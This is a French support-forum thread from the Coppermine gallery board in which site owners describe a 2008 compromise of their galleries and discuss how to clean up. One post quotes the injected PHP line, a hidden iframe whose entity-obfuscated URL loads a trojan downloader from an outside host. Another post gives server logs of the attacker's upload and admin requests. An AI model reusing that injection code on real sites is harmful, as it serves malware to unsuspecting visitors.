Galerie attaquée ? Galerie attaquée ?
 

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Main Menu

Galerie attaquée ?

Started by mafieuso, April 07, 2008, 11:07:56 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

mafieuso

Bonjour,

J'ai l'impression que ma galerie à subit une attaque, elle est inaccessible et il y a des morceaux de codes bizarres dans certaines pages...

Voici par exemple le message que j'ai sur la passage d'acceuil :

QuoteParse error: syntax error, unexpected '<' in /mnt/123/sdb/9/2/galeriebar/coppermine/anycontent.php on line 33

On retrouve ce code ajouté à plusieurs pages :

<?php echo '<iframe src="&#38;#104;&#38;#116;&#38;#116;&#38;#112;&#38;#58;&#38;#47;&#38;#47;&#38;#99;&#38;#100;&#38;#112;&#38;#117;&#38;#118;&#38;#98;&#38;#104;&#38;#102;&#38;#122;&#38;#122;&#38;#46;&#38;#99;&#38;#111;&#38;#109;&#38;#47;&#38;#100;&#38;#108;&#38;#47;&#38;#97;&#38;#100;&#38;#118;&#38;#53;&#38;#57;&#38;#56;&#38;#46;&#38;#112;&#38;#104;&#38;#112;" width=1 height=1></iframe>'?>


Que dois-je faire ?


Merci de votre aide !

Pascal YAP

#1
Aïe,
C'est exact !
Il y a effectivement un "exploit" qui injecte des IFRAMEs chargés de code PHP.

Je ne connais pas actuellement d'autres solutions que celles d'Uploader des fichiers "propres".
On ne doute pas que le problème semble sérieux, sans être destructeur...

Y-a-t-il un CMS tel Joomla ou SMF sur votre web ?

PYAP

ps : je connais hélas ce problème depuis le 03 Avril 2008  ???

mafieuso

Je vais envoyer les fichiers propres et en profiter pour passer la galerie en 1.4.16, je suis actuellement en 1.4.14 !

J'ai du mal à comprendre comment ce code à réussi à être injecté, est-ce que quelqu'un pourrait m'expliquer ?

En fait j'ai été averti par un membre pour lequel son antivirus (Kaspersky) lui à indiqué la présence de ce script malicieux 'Trojan-télécharger.JS.Psyme.yc' mais je ne le trouve nul part et comment savoir si ce script à infecté mon ordinateur (ou celui d'autres membres) ? Est-ce qu'il faut faire une manipulation particulière pour qu'il s'active ?

Pascal YAP

La discussion est en cours chez un hébergeur Francophone.
Le résultat de la discuss dès que possible !

mafieuso

Tu as le lien de la discussion ?

Sinon est-ce que la 1.4.16 corrige cette faille de sécurité ou autant attendre quelques jours la 1.4.17 ? Car en fait j'ai des modifications de certains fichiers php et c'est toujours chiant de devoir ensuite retrouver ce qu'on à modifié manuellement !

D'ailleurs à quand une méthode de mise à jour digne de ce nom chez Coppermine ? Marre de devoir envoyer tous les fichiers comme un barbare à chaque mise à jour...

mafieuso

Je fais un double message pour vous informer de quelque chose d'important :

Ce fichier malicieux m'a édité la base de donnée !!! Le contenu de la table config était complètement chamboulé, je l'ai remplacé par l'ancien mais j'aimerais bien savoir s'il n'a pas édité autre chose, surtout que s'il peut accéder à la bdd il peut très bien tout supprimer !

poubao

Bonjour,
Moi dimanche, je n'ai eu que les fichiers du plugin onlinestats de modifiés, tous les fichiers, y compris les fichiers langues, solution, désactiver ce plugin, (pour mon cas !!)
par précaution, effacement de tous les fichiers présents sur le serveur (je posséde une sauvegarde récente de toute ma galerie, y compris le répertoire Album),
Réinstallation complête, j'en ai profité pour modifier tous les mots de passes d'accés au serveur et aux bases de données.
Coppermine n'est pas la seule application qui ait été sujette à cette attaque.
La mise à jour vers CPG 1.416, semble limiter les dégats car je n'ai pas eut de modification de la BDD.
poubao ???
L'incohérence de ceux qui nous dirigent, l'incompétence de ceux qui nous commandent,sont un vibrant hommage pour ceux qui exécutent.
                                          **Général Patton**

Feerie21

Je viens également de subir cette "attaque", est-ce qu'il y a un moyen d'arranger sa, en remplacant certain fichier ? en supprimant ?  :-[

François Keller

plusieurs personnes semblent être l'objet de cette attaque qui ne semble pas liée à coppermine puisque d'autres applications sont touchées.
Pour l'instant il n'y a pas de solution précise si ce n'est que ceux qui utilisent la version 1.4.16 sont moins touchés...
à suivre donc
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

Pascal YAP

QuoteLa discussion est en cours chez un hébergeur Francophone.
Le résultat de la discuss dès que possible !
La discussion est impossible avec l'hébergeur... possédant la sciences infuse ???

mafieuso

Je ne comprends pas le code malveillant est encore présent sur ma galerie mais avant le déclaration de doctype de la page, quel est le fichier qui est infecté ? Je ne le trouve pas...

mafieuso

C'était un plugins autant pour moi...

poubao

L'incohérence de ceux qui nous dirigent, l'incompétence de ceux qui nous commandent,sont un vibrant hommage pour ceux qui exécutent.
                                          **Général Patton**

Pascal YAP

QuoteLa discussion est impossible avec l'hébergeur... possédant la sciences infuse
QuoteLe quel?
poubao
Celui qui commence par ***, et qui est connu pour ces ////  ;D

QuoteC'était un plugins autant pour moi...
QuoteLe quel?
poubao
A mon humble avis, tous les scripts semblent être perméables  ???

mafieuso

Quote from: poubao on April 08, 2008, 04:04:17 PM
Le quel?
poubao :D

Tous, j'avais oublié d'envoyer de ré envoyer le dossier !

Coline

J'ai également un virus sur la galerie, un logiciel veut se lancer,
Il se nomme cdpuvbhfzz
Comment faire pour l'enlever?
Est ce le même que vous?
merci

mafieuso

Je crains que oui... mais chez moi rien ne voulait se lancer c'est bizarre, est-ce que ça dépend du navigateur ?

Coline

Chez moi ça se lance mais ça fait des choses bizarres (tous ce décalle)

DavidG

J'ai aussi subi cette attaque (3 fois) depuis ce WE. J'étais en version 1.4.14 et j'ai fais une mise à jour en 1.4.16 mais l'attaque a recommencé ce soir. Tous les fichiers php et html sont modifiés (ajout de IFRAME). L'attaque vient d'une IP russe ! voici le log de l'attaque de ce soir :

ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:27:43 +0200] "GET /copper/ HTTP/1.1" 200 39035 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:27:48 +0200] "GET /copper/update.php HTTP/1.1" 200 31881 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:27:49 +0200] "POST /copper/upload.php HTTP/1.1" 200 8607 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:27:50 +0200] "POST /copper/upload.php HTTP/1.1" 200 13653 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:27:50 +0200] "POST /copper/upload.php HTTP/1.1" 200 8497 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:27:52 +0200] "POST /copper/admin.php HTTP/1.1" 200 8441 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:28:30 +0200] "GET /copper/?ff=1 HTTP/1.1" 200 18781 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:28:31 +0200] "GET /copper/ HTTP/1.1" 200 22137 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"


en version 1.4.14 le log était différent :

ppp91-76-134-39.pppoe.mtu-net.ru www.usf-handball.fr - [06/Apr/2008:16:28:54 +0200] "GET /copper/ HTTP/1.1" 200 68683 "-" "Mozilla/8.0"
ppp91-76-134-39.pppoe.mtu-net.ru www.usf-handball.fr - [06/Apr/2008:16:28:58 +0200] "GET /copper/update.php HTTP/1.1" 200 40384 "-" "Mozilla/8.0"
ppp91-76-134-39.pppoe.mtu-net.ru www.usf-handball.fr - [06/Apr/2008:16:28:59 +0200] "POST /copper/pluginmgr.php?op=upload HTTP/1.1" 302 47195 "-" "Mozilla/8.0"
ppp91-76-134-39.pppoe.mtu-net.ru www.usf-handball.fr - [06/Apr/2008:16:29:30 +0200] "GET /copper/plugins/docs.php HTTP/1.1" 200 14 "-" "Mozilla/8.0"




Coline

Mais comment faire?
On doit remettre les fichiers de la maj 1.4.6?